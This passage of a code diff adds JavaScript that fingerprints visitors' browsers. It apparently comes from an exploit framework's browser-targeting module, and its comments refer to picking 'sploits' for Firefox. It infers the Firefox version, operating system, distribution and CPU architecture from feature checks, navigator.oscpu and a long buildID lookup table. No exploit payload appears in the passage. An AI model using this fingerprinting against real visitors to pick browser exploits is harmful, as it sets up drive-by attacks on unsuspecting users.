+		ua_version = this.searchVersion(search, navigator.userAgent);
+		if (!ua_version || 0 == ua_version.length) {
+			ua_is_lying = true;
+		}
+	} else if (!document.all && navigator.taintEnabled) {
+		// Use taintEnabled to identify FF since other recent browsers
+		// implement window.getComputedStyle now.  For some reason, checking for
+		// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
+		// isn't IE first.
+		//
+		// Then this is a Gecko derivative, assume Firefox since that's the
+		// only one we have sploits for.  We may need to revisit this in the
+		// future.  This works for multi/browser/mozilla_compareto against
+		// Firefox and Mozilla, so it's probably good enough for now.
+		ua_name = clients_ff;
+		if (document.readyState) {
+			ua_version = "3.6";
+		} else if (String.trimRight) {
+			ua_version = "3.5";
+		} else if (document.getElementsByClassName) {
+			ua_version = "3";
+		} else if (window.Iterator) {
+			ua_version = "2";
+		} else if (Array.every) {
+			ua_version = "1.5";
+		} else {
+			ua_version = "1";
+		}
+
+		if (navigator.oscpu != navigator.platform) {
+			ua_is_lying = true;
+		}
+		// oscpu is unaffected by changes in the useragent and has values like:
+		//    "Linux i686"
+		//    "Windows NT 6.0"
+		// haven't tested on 64-bit Windows
+		version = navigator.oscpu;
+		if (version.match(/i.86/)) {
+			arch = arch_x86;
+		}
+		if (version.match(/x86_64/)) {
+			arch = arch_x86_64;
+		}
+		if (version.match(/Windows/)) {
+			os_name = oses_windows;
+			switch(version) {
+				case "Windows NT 5.0": os_flavor = "2000"; break;
+				case "Windows NT 5.1": os_flavor = "XP"; break;
+				case "Windows NT 5.2": os_flavor = "2003"; break;
+				case "Windows NT 6.0": os_flavor = "Vista"; break;
+				case "Windows NT 6.1": os_flavor = "7"; break;
+			}
+		}
+		if (version.match(/Linux/)) {
+			os_name = oses_linux;
+		}
+		// end navigator.oscpu checks
+
+		// buildID is unaffected by changes in the useragent and typically has
+		// the compile date which in some cases can be used to map to specific
+		// Version & O/S (including Distro and even Arch). Depending upon the
+		// buildID, sometime navigator.productSub will be needed.
+		//
+		// This technique, and the laboriously compiled associated table,
+		// submitted by Mark Fioravanti.
+
+		var buildid = navigator.buildID;
+
+		switch(buildid) {
+			case "2008041514": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2008041515": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "2008052312": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2008052906": ua_version = "3.0.0"; os_name = oses_windows; break;
+			case "2008052909": ua_version = "3.0.0.rc1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2008052912": ua_version = "3.0.0"; os_name = oses_linux; break;
+			case "2008060309": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+			case "2008070205": ua_version = "2.0.0.16"; os_name = oses_windows; break;
+			case "2008070206": ua_version = "3.0.1"; os_name = oses_linux; break;
+			case "2008070208": ua_version = "3.0.1"; os_name = oses_windows; break;
+			case "2008071222": ua_version = "3.0.1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2008072820":
+				switch (navigator.productSub) {
+					case "2008072820": ua_version = "3.0.1"; os_name = oses_linux; break;
+					case "2008092313": ua_version = "3.0.2"; os_name = oses_linux; break;
+				} break;
+			case "2008082909": ua_version = "2.0.0.17"; os_name = oses_windows; break;
+			case "2008091618": ua_version = "3.0.2"; os_name = oses_linux; break;
+			case "2008091620": ua_version = "3.0.2"; os_name = oses_windows; break;
+			case "2008092313": ua_version = "3.0.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2008092416": ua_version = "3.0.3"; os_name = oses_linux; break;
+			case "2008092417": ua_version = "3.0.3"; os_name = oses_windows; break;
+			case "2008092510": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2008101315":
+				switch (navigator.productSub) {
+					case "2008101315": ua_version = "3.0.3"; os_name = oses_linux; break;
+					case "2008111318": ua_version = "3.0.4"; os_name = oses_linux; arch = arch_x86; break;
+				} break;
+			case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break;
+			case "2008102920": ua_version = "3.0.4"; break;
+			case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+			case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break;
+			case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break;
+			case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break;
+			case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break;
+			case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break;
+			case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break;
+			case "2009012615": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2009012616": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2009021906": ua_version = "3.0.7"; os_name = oses_linux; break;
+			case "2009021910": ua_version = "3.0.7"; os_name = oses_windows; break;
+			case "2009030422": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2009032608": ua_version = "3.0.8"; os_name = oses_linux; break;
+			case "2009032609": ua_version = "3.0.8"; os_name = oses_windows; break;
+			case "2009032711": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2009033100":
+				switch (navigator.productSub) {
+					case "2009033100": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+					case "2009042113": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+				} break;
+			case "2009040820": ua_version = "3.0.9"; os_name = oses_linux; break;
+			case "2009040821": ua_version = "3.0.9"; os_name = oses_windows; break;
+			case "2009042113": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2009042114": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "2009042315": ua_version = "3.0.10"; os_name = oses_linux; break;
+			case "2009042316": ua_version = "3.0.10"; os_name = oses_windows; break;
+			case "20090427153806": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20090427153807": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "2009060214": ua_version = "3.0.11"; os_name = oses_linux; break;
+			case "2009060215": ua_version = "3.0.11"; os_name = oses_windows; break;
+			case "2009060308":
+				switch (navigator.productSub) {
+					case "2009060308": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+					case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+				} break;
+			case "2009060309":
+				switch (navigator.productSub) {
+					case "2009060309": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+					case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+				} break;
+			case "2009060310": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "BackTrack"; break;
+			case "2009062005": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "PCLunixOS"; break;
+			case "20090624012136": ua_version = "3.5.0"; os_name = oses_mac_osx; break;
+			case "20090624012820": ua_version = "3.5.0"; os_name = oses_linux; break;
+			case "20090701234143": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20090702060527": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
+			case "2009070610": ua_version = "3.0.12"; os_name = oses_linux; break;
+			case "2009070611": ua_version = "3.0.12"; os_name = oses_windows; break;
+			case "2009070811": ua_version = "3.0.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+			case "20090715083437": ua_version = "3.5.1"; os_name = oses_mac_osx; break;
+			case "20090715083816": ua_version = "3.5.1"; os_name = oses_linux; break;
+			case "20090715094852": ua_version = "3.5.1"; os_name = oses_windows; break;
+			case "2009072202": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Oracle"; break;
+			case "2009072711": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "CentOS"; break;
+			case "20090729211433": ua_version = "3.5.2"; os_name = oses_mac_osx; break;
+			case "20090729211829": ua_version = "3.5.2"; os_name = oses_linux; break;
+			case "20090729225027": ua_version = "3.5.2"; os_name = oses_windows; break;
+			case "2009073021": ua_version = "3.0.13"; os_name = oses_linux; break;
+			case "2009073022": ua_version = "3.0.13"; os_name = oses_windows; break;
+			case "20090824085414": ua_version = "3.5.3"; os_name = oses_mac_osx; break;
+			case "20090824085743": ua_version = "3.5.3"; os_name = oses_linux; break;
+			case "20090824101458": ua_version = "3.5.3"; os_name = oses_windows; break;
+			case "2009082707": ua_version = "3.0.14"; break;
+			case "2009090216": ua_version = "3.0.14"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20090914014745": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
+			case "20090915065903": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
+			case "20090915070141": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break;
+			case "20091007090112": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
+			case "20091007095328": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
+			case "2009101600":
+				switch (navigator.productSub) {
+					case "2009101600": ua_version = "3.0.15"; break; // Can be either Mac or Linux
+					case "20091016": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "SUSE"; arch = arch_x86; break;
+				} break;
+			case "2009101601": ua_version = "3.0.15"; os_name = oses_windows; break;
+			case "20091016081620": ua_version = "3.5.4"; os_name = oses_mac_osx; break;
+			case "20091016081727": ua_version = "3.5.4"; os_name = oses_linux; break;
+			case "20091016092926": ua_version = "3.5.4"; os_name = oses_windows; break;
+			case "20091020122601": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
+			case "2009102814":
+				switch (navigator.productSub) {
+					case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+					case "2009121602": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+					case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Mint"; break;
+					case "2010021501": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86; break;
+					case "2010021502": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break;
+				} break;
+			case "2009102815":
+				switch (navigator.productSub) {
+					case "2009102815": ua_version = "3.0.15"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+					case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+				} break;
+			case "20091029152254": ua_version = "3.6.0.b1"; os_name = oses_linux; break;
+			case "20091029171059": ua_version = "3.6.0.b1"; os_name = oses_windows; break;
+			case "20091102134505": ua_version = "3.5.5"; os_name = oses_mac_osx; break;
+			case "20091102141836": ua_version = "3.5.5"; os_name = oses_linux; break;
+			case "20091102152451": ua_version = "3.5.5"; os_name = oses_windows; break;
+			case "2009110421": ua_version = "3.0.15"; os_name = oses_freebsd; arch = arch_x86; break;
+			case "20091106091959": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
+			case "20091106140514": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20091106145609": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
+			case "20091108163911": ua_version = "3.6.0.b2"; os_name = oses_linux; break;
+			case "20091108181924": ua_version = "3.6.0.b2"; os_name = oses_windows; break;
+			case "20091109125225":
+				switch (navigator.productSub) {
+					case "20091109": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+					case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+				} break;
+			case "20091109134913": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20091115172547": ua_version = "3.6.0.b3"; os_name = oses_linux; break;
+			case "20091115182845": ua_version = "3.6.0.b3"; os_name = oses_windows; break;
+			case "20091124201530": ua_version = "3.6.0.b4"; os_name = oses_mac_osx; break;
+			case "20091124201751": ua_version = "3.6.0.b4"; os_name = oses_linux; break;
+			case "20091124213835": ua_version = "3.6.0.b4"; os_name = oses_windows; break;
+			case "2009120100": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "SUSE"; break;
+			case "20091201203240": ua_version = "3.5.6"; os_name = oses_mac_osx; break;
+			case "20091201204959": ua_version = "3.5.6"; os_name = oses_linux; break;
+			case "20091201220228": ua_version = "3.5.6"; os_name = oses_windows; break;
+			case "2009120206": ua_version = "3.0.16"; break; // Can be either Mac or Linux
+			case "2009120208": ua_version = "3.0.16"; os_name = oses_windows; break;
+			case "20091204132459": ua_version = "3.6.0.b5"; os_name = oses_linux; break;
+			case "20091204132509": ua_version = "3.6.0.b5"; os_name = oses_mac_osx; break;
+			case "20091204143806": ua_version = "3.6.0.b5"; os_name = oses_windows; break;
+			case "20091215230859": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20091215230946": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20091215231400": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
+			case "20091215231754":
+				switch (navigator.productSub) {
+					case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+					case "20100106": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
+				} break;
+			case "2009121601":
+				switch (navigator.productSub) {
+					case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+					case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // Could also be Mint x86-64
+				} break;
+			case "2009121602": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+			case "20091216104148": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Mandriva"; break;
+			case "20091216132458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20091216132537": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
+			case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux
+			case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break;
+			case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break;
+			case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break;
+			case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break;
+			case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break;
+			case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break;
+			case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break;
+			case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break;
+			case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break;
+			case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
+			case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
+			case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
+			case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
+			case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20100110112429": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Mandriva"; break;
+			case "20100115132715": ua_version = "3.6.0"; os_name = oses_mac_osx; break;
+			case "20100115133306": ua_version = "3.6.0"; os_name = oses_linux; break;
+			case "20100115144158": ua_version = "3.6.0"; os_name = oses_windows; break;
+			case "20100125074043": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
+			case "20100125074127": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
+			case "20100125204847": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; // Could also be Mint x86
+			case "20100125204903": ua_version = "3.6.0"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; // Could also be Mint x86-64
+			case "20100202152834": ua_version = "3.5.8"; os_name = oses_mac_osx; break;
+			case "20100202153512": ua_version = "3.5.8"; os_name = oses_linux; break;
+			case "20100202165920": ua_version = "3.5.8"; os_name = oses_windows; break;
+			case "2010020219": ua_version = "3.0.18"; os_name = oses_mac_osx; break;
+			case "2010020220": ua_version = "3.0.18"; os_name = oses_windows; break;
+			case "2010020400": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "SUSE"; break;
+			case "20100212131909": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100212132013": ua_version = "3.6.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100216105329": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20100216105348": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20100216105410": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20100216110009": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "2010021718": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
+			case "20100218022359": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100218022705": ua_version = "3.6.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100218112915": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
+			case "20100222120605": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100222120717": ua_version = "3.6.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100301015346": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20100305054927": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
+			case "20100307204001": ua_version = "3.6.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20100308142847": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100308151019": ua_version = "3.6.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "2010031218": ua_version = "3.0.19"; break; // Mac OS X or Linux
+			case "2010031422": ua_version = "3.0.19"; os_name = oses_windows; break;
+			case "20100315075757": ua_version = "3.5.9"; os_name = oses_linux; break;
+			case "20100315080228": ua_version = "3.5.9"; os_name = oses_mac_osx; break;
+			case "20100315083431": ua_version = "3.5.9"; os_name = oses_windows; break;
+			case "20100316055951": ua_version = "3.6.2"; os_name = oses_mac_osx; break;
+			case "20100316060223": ua_version = "3.6.2"; os_name = oses_linux; break;
+			case "20100316074819": ua_version = "3.6.2"; os_name = oses_windows; break;
+			case "2010031700": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "SUSE"; break;
+			case "20100323102218": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20100323102339": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20100323194640": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
+			case "20100324182054": ua_version = "3.6.2"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20100330071911": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20100330072017": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20100330072020": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20100330072034": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20100401064631": ua_version = "3.6.3"; os_name = oses_mac_osx; break;
+			case "20100401074458": ua_version = "3.6.3"; os_name = oses_linux; break;
+			case "20100401080539": ua_version = "3.6.3"; os_name = oses_windows; break;
+			case "20100401144201": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break;
+			case "20100402041908": ua_version = "3.6.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100403042003": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20100403082016": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20100404024515": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100404024646": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100404104043": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
+			case "20100409151117": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100409170726": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100412125148": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
+			case "20100413152922": ua_version = "3.6.4.b1"; os_name = oses_mac_osx; break;
+			case "20100413154310": ua_version = "3.6.4.b1"; os_name = oses_linux; break;
+			case "20100413172113": ua_version = "3.6.4.b1"; os_name = oses_windows; break;
+			case "20100415062243": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100415103754": ua_version = "3.6.3.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100416101101": ua_version = "3.6.3.2"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
+			case "2010041700": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break;
+			case "20100419015333": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
+			case "20100423043606": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
+			case "20100423140709": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100423141150": ua_version = "3.6.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100423142835": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
+			case "20100502202326": ua_version = "3.6.4.b2"; os_name = oses_linux; break;
+			case "20100502202401": ua_version = "3.6.4.b2"; os_name = oses_mac_osx; break;
+			case "20100502221517": ua_version = "3.6.4.b2"; os_name = oses_windows; break;
+			case "20100503113315": ua_version = "3.6.4.b3"; os_name = oses_mac_osx; break;
+			case "20100503113541": ua_version = "3.6.4.b3"; os_name = oses_linux; break;
+			case "20100503122926": ua_version = "3.6.4.b3"; os_name = oses_windows; break;
+			case "20100504085637": ua_version = "3.5.10"; os_name = oses_linux; break;
+			case "20100504085753": ua_version = "3.5.10"; os_name = oses_mac_osx; break;
+			case "20100504093643": ua_version = "3.5.10"; os_name = oses_windows; break;
+			case "2010050600": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "SUSE"; break;
+			case "2010051300": ua_version = "3.6.4.1"; os_name = oses_linux; os_flavor = "SUSE"; break;
+			case "20100513134853": ua_version = "3.6.4.b4"; os_name = oses_mac_osx; break;
+			case "20100513140540": ua_version = "3.6.4.b4"; os_name = oses_linux; break;
+			case "20100513144105": ua_version = "3.6.4.b4"; os_name = oses_windows; break;
+			case "20100513190740": ua_version = "3.6.3"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
+			case "20100523180910": ua_version = "3.6.4.b5"; os_name = oses_mac_osx; break;
+			case "20100523181754": ua_version = "3.6.4.b5"; os_name = oses_linux; break;
+			case "20100523185824": ua_version = "3.6.4.b5"; os_name = oses_windows; break;
+			case "20100527084110": ua_version = "3.6.4.b6"; os_name = oses_mac_osx; break;
+			case "20100527085242": ua_version = "3.6.4.b6"; os_name = oses_linux; break;
+			case "20100527093236": ua_version = "3.6.4.b6"; os_name = oses_windows; break;
+			case "2010061100": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "SUSE"; break;
+			case "20100611134546": ua_version = "3.6.4.b7"; os_name = oses_mac_osx; break;
+			case "20100611135942": ua_version = "3.6.4.b7"; os_name = oses_linux; break;
+			case "20100611143157": ua_version = "3.6.4.b7"; os_name = oses_windows; break;
+			case "20100622203044": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20100622203045": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20100622204750": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
+			case "20100622204830": ua_version = "3.5.10"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
+			case "20100622205038": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "PClinuxOS"; arch = arch_x86_64; break;
+			case "20100623081410": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86_64; break;
+			case "20100623081921": ua_version = "3.6.4"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
+			case "20100623155731": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
+			case "20100623200132": ua_version = "3.6.4.b7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
+			case "20100625222733": ua_version = "3.6.6"; os_name = oses_linux; break;
+			case "20100625223402": ua_version = "3.6.6"; os_name = oses_mac_osx; break;
